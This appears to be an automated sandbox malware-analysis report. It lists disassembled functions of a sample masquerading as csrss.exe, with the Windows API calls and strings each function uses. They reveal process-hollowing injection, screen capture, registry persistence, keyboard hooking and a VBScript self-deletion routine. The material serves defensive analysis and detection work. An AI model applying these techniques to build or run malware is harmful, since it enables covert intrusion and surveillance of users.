Opcode Fuzzy Hash: fedda4d9ca6f521b39dafd7f748c08fa085f514d70900713aa905dabea7deedc
Instruction Fuzzy Hash: B2618FB9E00709E7FB208D3448917BE7399EF01E85F8C191AE9D2DF6F0D951E9428365

Function 33D7E558 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed33651b7ebf2a743d3dada670637801949ec3100d36cf1df7871ba046a0071c
Instruction ID: aa9e02b4fdb7684eb6e7faab441fdc50f68eb087028dc8f2f199594e41569db0
Opcode Fuzzy Hash: ed33651b7ebf2a743d3dada670637801949ec3100d36cf1df7871ba046a0071c
Instruction Fuzzy Hash: 9F6171B9A4070D97FA348D248890BFE7399EF41E80F940D1AE4C2DF6F0EA51E9428765

Function 33D8F42D Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 33D8F454
_free.LIBCMT ref: 33D8F4BF
_free.LIBCMT ref: 33D8F4E5
_free.LIBCMT ref: 33D8F50E
_free.LIBCMT ref: 33D8F546
_free.LIBCMT ref: 33D8F577
_free.LIBCMT ref: 33D8F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 33D8F639
_free.LIBCMT ref: 33D8F652
_wcschr.LIBVCRUNTIME ref: 33D8F68F
_free.LIBCMT ref: 33D8F6FB
_free.LIBCMT ref: 33D8F721
_free.LIBCMT ref: 33D8F74A
_free.LIBCMT ref: 33D8F77F
_free.LIBCMT ref: 33D8F7B0
_free.LIBCMT ref: 33D8F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33D8F876
_free.LIBCMT ref: 33D8F88F

Strings

0sq, xrefs: 33D8F46A, 33D8F47E, 33D8F48A, 33D8F4E0, 33D8F4EA, 33D8F51E, 33D8F543, 33D8F56E, 33D8F5AF, 33D8F5D7, 33D8F6D5, 33D8F71C, 33D8F729

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID: 0sq
API String ID: 2719235668-4164572957
Opcode ID: 91a16a427c365173df47ed368499b8467df51aa3cc501fba581b0243e2787629
Instruction ID: afeed27145745ff518e441fd62ff93fd3dbd35f353b90704634a37f826f35b3c
Opcode Fuzzy Hash: 91a16a427c365173df47ed368499b8467df51aa3cc501fba581b0243e2787629
Instruction Fuzzy Hash: 71D138B6D05304ABEB14AF78EC8169D77ECEF04B60F44436EE955AF680EB35B50187A0

Function 33D52475 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,H#z,00000003), ref: 33D52494
ExitProcess.KERNEL32(00000000), ref: 33D524A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 33D5251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 33D52529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D52534
CloseHandle.KERNEL32(00000000), ref: 33D5253B
GetCurrentProcessId.KERNEL32 ref: 33D52541
PathFileExistsW.SHLWAPI(?), ref: 33D52572
GetTempPathW.KERNEL32(00000104,?), ref: 33D525D5
GetTempFileNameW.KERNEL32(?,33DAC57C,00000000,?), ref: 33D525EF
lstrcatW.KERNEL32(?,33DAC588), ref: 33D52601

Part of subcall function 33D5C3F1: CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000), ref: 33D5C430

Sleep.KERNEL32(000001F4), ref: 33D52682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 33D52697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D526A2
CloseHandle.KERNEL32(00000000), ref: 33D526A9
GetCurrentProcessId.KERNEL32 ref: 33D526AF

Strings

WDH, xrefs: 33D52548, 33D526B6
H#z, xrefs: 33D5247F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExistsExitMutexNameSleeplstrcat
String ID: H#z$WDH
API String ID: 1507772987-1919101033
Opcode ID: e0e0a7827329e18f81a3c849d4740fb96ef1665f8e3f747a5cc5a01c631a9d14
Instruction ID: 1729479b80265856c71e9f2f93f50a672d763321d4c608cd3071ae187e751b77
Opcode Fuzzy Hash: e0e0a7827329e18f81a3c849d4740fb96ef1665f8e3f747a5cc5a01c631a9d14
Instruction Fuzzy Hash: 5251B272E01309AFEF04ABB0DC98EEE33BDAB48250F400155F412E7581DF759E4A8B64

Function 33D58E76 Relevance: 30.3, APIs: 20, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(33DAC878,00000000,00000000,00000000), ref: 33D58E90
CreateCompatibleDC.GDI32(00000000), ref: 33D58E9D

Part of subcall function 33D59325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 33D59355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 33D58F13
DeleteObject.GDI32(00000000), ref: 33D58F30
SelectObject.GDI32(00000000,00000000), ref: 33D58F51
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 33D58F89
GetCursorInfo.USER32(?), ref: 33D58FA7
GetIconInfo.USER32(?,?), ref: 33D58FBD
DeleteObject.GDI32(?), ref: 33D58FEC
DeleteObject.GDI32(?), ref: 33D58FF9
DrawIcon.USER32(00000000,?,?,?), ref: 33D59006
BitBlt.GDI32(00000000,00000000,00000000,?,?,33DB3198,00000000,00000000,00660046), ref: 33D5903C
GetObjectA.GDI32(00000000,00000018,?), ref: 33D59068
LocalAlloc.KERNEL32(00000040,00000001), ref: 33D590D5
GlobalAlloc.KERNEL32(00000000,?), ref: 33D59144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 33D59168
DeleteObject.GDI32(00000000), ref: 33D59182
GlobalFree.KERNEL32(?), ref: 33D5918D
DeleteObject.GDI32(00000000), ref: 33D59241
GlobalFree.KERNEL32(?), ref: 33D59248

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Object$Delete$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID:
API String ID: 2309981249-0
Opcode ID: 5776407865096dd2c0e958c6e52d48285f1964831b8b4ceeff6ce5d59bcd438d
Instruction ID: 10dcb18ba7ac87b02b385e8280f7aba3b57aebb775bde369c93d6504d3d033bf
Opcode Fuzzy Hash: 5776407865096dd2c0e958c6e52d48285f1964831b8b4ceeff6ce5d59bcd438d
Instruction Fuzzy Hash: 73C15D76508344AFE720DF24C848B6BBBE9FF88750F44481DF59AE3650DB31A915CB62

Function 33D580EF Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 289threadinjectionprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 33D58217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 33D5822F
GetThreadContext.KERNEL32(?,00000000), ref: 33D58245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 33D5826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 33D582ED
TerminateProcess.KERNEL32(?,00000000), ref: 33D58301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 33D58341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 33D5840B
SetThreadContext.KERNEL32(?,00000000), ref: 33D58428
ResumeThread.KERNEL32(?), ref: 33D58435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 33D5844C
GetCurrentProcess.KERNEL32(?), ref: 33D58457
TerminateProcess.KERNEL32(?,00000000), ref: 33D58472
GetLastError.KERNEL32 ref: 33D5847A

Strings

ntdll, xrefs: 33D58121, 33D58140, 33D58154, 33D58168

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ntdll
API String ID: 3275803005-3337577438
Opcode ID: 442e06c4d1069290cdd9320a6e1545a248f862432721dba0094903a475c9bf08
Instruction ID: 039c91bed57e4dfa15b61cfd1b4e07d6c0639917817d84e17d66d1a14233d76c
Opcode Fuzzy Hash: 442e06c4d1069290cdd9320a6e1545a248f862432721dba0094903a475c9bf08
Instruction Fuzzy Hash: A8A18DB2604304EFEB109F64CC85B6ABBE8FF48746F444929FA45E6191E770E805CFA5

Function 33D5C01B Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 33D5C036
lstrlenW.KERNEL32(?), ref: 33D5C067
FindFirstVolumeW.KERNEL32(?,00000104), ref: 33D5C0A2
GetLastError.KERNEL32 ref: 33D5C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 33D5C0F9
lstrcmpW.KERNEL32(?,?), ref: 33D5C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 33D5C12C
FindVolumeClose.KERNEL32(?), ref: 33D5C15B
GetLastError.KERNEL32 ref: 33D5C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 33D5C1A0
lstrcatW.KERNEL32(?,?), ref: 33D5C1B9
lstrcpyW.KERNEL32(?,?), ref: 33D5C1C8
GetLastError.KERNEL32 ref: 33D5C1D0

Strings

?, xrefs: 33D5C0CD

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
String ID: ?
API String ID: 1756451316-1684325040
Opcode ID: f8c5cf3a45c6142aef69b11d9bfbb7c1642fdf9fa0686160fd5b889f3276d007
Instruction ID: 5e3a9c6f18ba925d6683cf9802662db6b96699e2f12694dafd2f66d5a959972e
Opcode Fuzzy Hash: f8c5cf3a45c6142aef69b11d9bfbb7c1642fdf9fa0686160fd5b889f3276d007
Instruction Fuzzy Hash: 3F417F76504305ABEB10EF64D88899BB7ECFB48754F44092AF585E3160EB71C54DCBE2

Function 33D85D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 33D85DC6
_free.LIBCMT ref: 33D85DDC
_free.LIBCMT ref: 33D85DED
_free.LIBCMT ref: 33D85DFE
_free.LIBCMT ref: 33D85E15
GetCPInfo.KERNEL32(?,?), ref: 33D85E5D

Part of subcall function 33D92E74: _free.LIBCMT ref: 33D92EDF

_free.LIBCMT ref: 33D86009
_free.LIBCMT ref: 33D8601C
_free.LIBCMT ref: 33D8602A
_free.LIBCMT ref: 33D86035
_free.LIBCMT ref: 33D86077
_free.LIBCMT ref: 33D8607F
_free.LIBCMT ref: 33D86087
_free.LIBCMT ref: 33D8608F
_free.LIBCMT ref: 33D8609D

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 44d1a28a632ec6abb2b7b8d872ad4d572e4136a99c2284a60e4f0d04866632b2
Instruction ID: 0eafcb38e357275e1a0fbbb0cde2c76aa4db513ac024a8db98cc4814a00810d0
Opcode Fuzzy Hash: 44d1a28a632ec6abb2b7b8d872ad4d572e4136a99c2284a60e4f0d04866632b2
Instruction Fuzzy Hash: 90B1DEB5D003099FDB11CFA9C880BEEBBF5FF08711F444169E694AB641DB76A941CBA0

Function 33D912C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 33D9130A

Part of subcall function 33D90502: _free.LIBCMT ref: 33D9051F
Part of subcall function 33D90502: _free.LIBCMT ref: 33D90531
Part of subcall function 33D90502: _free.LIBCMT ref: 33D90543
Part of subcall function 33D90502: _free.LIBCMT ref: 33D90555
Part of subcall function 33D90502: _free.LIBCMT ref: 33D90567
Part of subcall function 33D90502: _free.LIBCMT ref: 33D90579
Part of subcall function 33D90502: _free.LIBCMT ref: 33D9058B
Part of subcall function 33D90502: _free.LIBCMT ref: 33D9059D
Part of subcall function 33D90502: _free.LIBCMT ref: 33D905AF
Part of subcall function 33D90502: _free.LIBCMT ref: 33D905C1
Part of subcall function 33D90502: _free.LIBCMT ref: 33D905D3
Part of subcall function 33D90502: _free.LIBCMT ref: 33D905E5
Part of subcall function 33D90502: _free.LIBCMT ref: 33D905F7

_free.LIBCMT ref: 33D912FF

Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA

_free.LIBCMT ref: 33D91321
_free.LIBCMT ref: 33D91336
_free.LIBCMT ref: 33D91341
_free.LIBCMT ref: 33D91363
_free.LIBCMT ref: 33D91376
_free.LIBCMT ref: 33D91384
_free.LIBCMT ref: 33D9138F
_free.LIBCMT ref: 33D913C7
_free.LIBCMT ref: 33D913CE
_free.LIBCMT ref: 33D913EB
_free.LIBCMT ref: 33D91403

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a51e2d1c0c33d26b9dbd96af6b3d708ec868808c7a76008e082d0c66d8eeb561
Instruction ID: 1e437b4b357aa5b76448533d706ab04dd55f1633d7fc5f0e7c6d54d06cba1144
Opcode Fuzzy Hash: a51e2d1c0c33d26b9dbd96af6b3d708ec868808c7a76008e082d0c66d8eeb561
Instruction Fuzzy Hash: 8C315C75E003059FFB118A3ADC41B9A73F8EF047A2F548619E469DAD90DA31BD408BA4

Function 33D7A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?), ref: 33D7A892
GetLastError.KERNEL32 ref: 33D7A89F
__dosmaperr.LIBCMT ref: 33D7A8A6
MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 33D7A8D2
GetLastError.KERNEL32 ref: 33D7A8DC
__dosmaperr.LIBCMT ref: 33D7A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 33D7A926
GetLastError.KERNEL32 ref: 33D7A930
__dosmaperr.LIBCMT ref: 33D7A937
_free.LIBCMT ref: 33D7A943
_free.LIBCMT ref: 33D7A94A

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 30944464e3eddbf9cd85665fc6bd988199de00cdc213f1e8af939310fdd0377f
Instruction ID: f1e809447cd22ff97d72b7fa68284d7cb6a74229513950d0077238e3cb70e7a1
Opcode Fuzzy Hash: 30944464e3eddbf9cd85665fc6bd988199de00cdc213f1e8af939310fdd0377f
Instruction Fuzzy Hash: CB31C0B680430ABFEF019FA4CC44D9F3B6CEF05B65B544259F9206A690DB32C911DBB0

Function 33D4D096 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 33D52850: TerminateProcess.KERNEL32(00000000,pth_unenc,33D4F8C8), ref: 33D52860
Part of subcall function 33D52850: WaitForSingleObject.KERNEL32(000000FF), ref: 33D52873

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 33D4D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 33D4D1B8

Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A27D,00000000,33DB52F0,pth_unenc,33D4D0B8,@{t,33DB52F0,?,pth_unenc), ref: 33D4B8BB
Part of subcall function 33D4B8AC: UnhookWindowsHookEx.USER32(33DB50F0), ref: 33D4B8C7
Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A267,00000000,?,pth_unenc), ref: 33D4B8D5

Part of subcall function 33D5B978: GetCurrentProcessId.KERNEL32(00000000,33D9928C,00000000,?,?,?,?,33DA6468,33D4D20D,33DA6F7C), ref: 33D5B99F

ShellExecuteW.SHELL32(00000000,33DA6108,00000000,33DA6468,33DA6468,00000000), ref: 33D4D412
ExitProcess.KERNEL32 ref: 33D4D419

Strings

fso.DeleteFolder ", xrefs: 33D4D38A
On Error Resume Next, xrefs: 33D4D294
pth_unenc, xrefs: 33D4D09C
while fso.FileExists(", xrefs: 33D4D2C8
@{t, xrefs: 33D4D09F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: ProcessTerminate$Thread$CurrentDeleteExecuteExitFileHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: @{t$On Error Resume Next$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
API String ID: 97251228-2268932122
Opcode ID: 11be5dd9c92e361c9e5eb766ce30c681dbb008febd24ec25ecda362c74fe54dc
Instruction ID: e2af9dad2775219dd1b12d9d57614d335e53ba415dd20b504547f9ea4ed979c6
Opcode Fuzzy Hash: 11be5dd9c92e361c9e5eb766ce30c681dbb008febd24ec25ecda362c74fe54dc
Instruction Fuzzy Hash: D281C472A043009FDB15EB75C850AAFB7E9AF95200F50441DF19697996EF309E0EC7B2

Function 33D520F7 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 33D52106

Part of subcall function 33D53877: RegCreateKeyA.ADVAPI32(80000001,00000000,33DA60A4), ref: 33D53885
Part of subcall function 33D53877: RegSetValueExA.KERNEL32(33DA60A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538A0
Part of subcall function 33D53877: RegCloseKey.ADVAPI32(33DA60A4,?,?,?,33D4C152,33DA6C48,00000001,000000AF,33DA60A4), ref: 33D538AB

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 33D52146
CloseHandle.KERNEL32(00000000), ref: 33D52155
CreateThread.KERNEL32(00000000,00000000,33D527EE,00000000,00000000,00000000), ref: 33D521AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 33D5241A

Strings

WDH, xrefs: 33D521B5, 33D521BB, 33D52420
@{t, xrefs: 33D521E2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: @{t$WDH
API String ID: 3018269243-509694709
Opcode ID: ca2a93cef428e9ec4eafb0056eab1a988ea3f884a3948619545cb6f44c410e91
Instruction ID: f4e1b06839f9b02f566619b7b4f716f16598260a8ffde60ffd28d9e416c2027c
Opcode Fuzzy Hash: ca2a93cef428e9ec4eafb0056eab1a988ea3f884a3948619545cb6f44c410e91
Instruction Fuzzy Hash: 08719332D043019BEA18FB75C95596EB7F5AFE1250F40052DF49393991EF609A0DCBB2

Function 33D4CDF9 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 203COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,H#z,00000005,00000004,00000000,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,33DA739C,00000000,0000000E), ref: 33D4CE20
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 33D4CF6E
CloseHandle.KERNEL32 ref: 33D4D02D
ShellExecuteW.SHELL32(00000000,33DA6108,00000000,33DA6468,33DA6468,00000001), ref: 33D4D04B
ExitProcess.KERNEL32 ref: 33D4D062

Strings

C:\Users\user\AppData\Roaming\csrss.exe, xrefs: 33D4CE91, 33D4CE96, 33D4CEC9, 33D4CF7E, 33D4CF83, 33D4CF8A, 33D4CFEB
6, xrefs: 33D4CEDA
@{t, xrefs: 33D4CE48, 33D4CE73
H#z, xrefs: 33D4CDFC

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$@{t$C:\Users\user\AppData\Roaming\csrss.exe$H#z
API String ID: 2323119506-1557855327
Opcode ID: ee5e85405fcfe19624bd6b89c16ab5001f797ccbf721f93389aca1de0519ac0a
Instruction ID: d02e0d1c42744aa6f0e394599989ac885442a683f7ccf80960629f6d2d66baa4
Opcode Fuzzy Hash: ee5e85405fcfe19624bd6b89c16ab5001f797ccbf721f93389aca1de0519ac0a
Instruction Fuzzy Hash: 07512562A49301BBDA48E735CC50F6F7BAD6F84A21F44041DF14697EC2EF649D068376

Function 33D88121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 33D88135

Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA

_free.LIBCMT ref: 33D88141
_free.LIBCMT ref: 33D8814C
_free.LIBCMT ref: 33D88157
_free.LIBCMT ref: 33D88162
_free.LIBCMT ref: 33D8816D
_free.LIBCMT ref: 33D88178
_free.LIBCMT ref: 33D88183
_free.LIBCMT ref: 33D8818E
_free.LIBCMT ref: 33D8819C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9bf08c783583dd471ef92c5d4d56aa657e5436e5bdea1d50dd12223246095533
Instruction ID: 9c0187963db34078d915e774afb70d25a924671afb7717781a67fac1cc0e6a8b
Opcode Fuzzy Hash: 9bf08c783583dd471ef92c5d4d56aa657e5436e5bdea1d50dd12223246095533
Instruction Fuzzy Hash: 7311637A90020CAFCB01DF55CD42CD93BA5BF04267B5140A5BA588FA21DA31EF509BE4

Function 33D4F474 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,H#z,?,33DB5338), ref: 33D4F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 33D4F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 33D4F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 33D4F554
CloseHandle.KERNEL32(00000000), ref: 33D4F563

Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 33D5C1F5
Part of subcall function 33D5C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 33D5C208

CloseHandle.KERNEL32(00000000), ref: 33D4F66E

Strings

@{t, xrefs: 33D4F67D
H#z, xrefs: 33D4F483

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: @{t$H#z
API String ID: 3756808967-3949992536
Opcode ID: dd461a2c1a6ff62700f5c2c7288b3569f5be7ee983a02b5aea77c9509c1ce66d
Instruction ID: f2abb689b8f0e5f2ed25c86e77cd6ee86033458d2dafcc55375d0d55055a3a3b
Opcode Fuzzy Hash: dd461a2c1a6ff62700f5c2c7288b3569f5be7ee983a02b5aea77c9509c1ce66d
Instruction Fuzzy Hash: EA714F319083419FDB14EF71D890EAEBBE9AF94640F40091DF5C6479A2EF34994ECB62

Function 33D54BB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

65535, xrefs: 33D54BB3
udp, xrefs: 33D54C60, 33D54C68, 33D54C6C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 9178808a1a156b4edbb27191d82bb1b7677639716f355d8a2e4828a00f1ac326
Instruction ID: 550a7f6bff2f22228d1212a6c4f24a73b7c7bac58964d619d374ad94dcecfa3c
Opcode Fuzzy Hash: 9178808a1a156b4edbb27191d82bb1b7677639716f355d8a2e4828a00f1ac326
Instruction Fuzzy Hash: F351D4B96053059FFB019F6AC904B7B37F8AF84F90F49482AF8C097290DB65D8C18663

Function 33D8CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b81aa17513fd8e72e0a1187b67e17f3cf69875b5463c1453288d224ff180ce2d
Instruction ID: 1028b794b912c13eb661f91f4ed802462bfaeb131e38de05a7c4f779ade2fa21
Opcode Fuzzy Hash: b81aa17513fd8e72e0a1187b67e17f3cf69875b5463c1453288d224ff180ce2d
Instruction Fuzzy Hash: 49C1A2B6E04349EFEB01DFA8C841BADBBF4AF09710F484195E954AF285C734A946CB71

Function 33D4D420 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 33D52850: TerminateProcess.KERNEL32(00000000,pth_unenc,33D4F8C8), ref: 33D52860
Part of subcall function 33D52850: WaitForSingleObject.KERNEL32(000000FF), ref: 33D52873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 33D4D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 33D4D530

Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A27D,00000000,33DB52F0,pth_unenc,33D4D0B8,@{t,33DB52F0,?,pth_unenc), ref: 33D4B8BB
Part of subcall function 33D4B8AC: UnhookWindowsHookEx.USER32(33DB50F0), ref: 33D4B8C7
Part of subcall function 33D4B8AC: TerminateThread.KERNEL32(33D4A267,00000000,?,pth_unenc), ref: 33D4B8D5

Part of subcall function 33D5C3F1: CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000), ref: 33D5C430

ShellExecuteW.SHELL32(00000000,33DA6108,00000000,33DA6468,33DA6468,00000000), ref: 33D4D7C4
ExitProcess.KERNEL32 ref: 33D4D7D0

Strings

fso.DeleteFolder ", xrefs: 33D4D6AB
On Error Resume Next, xrefs: 33D4D5B9
while fso.FileExists(", xrefs: 33D4D5EC

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Terminate$FileProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
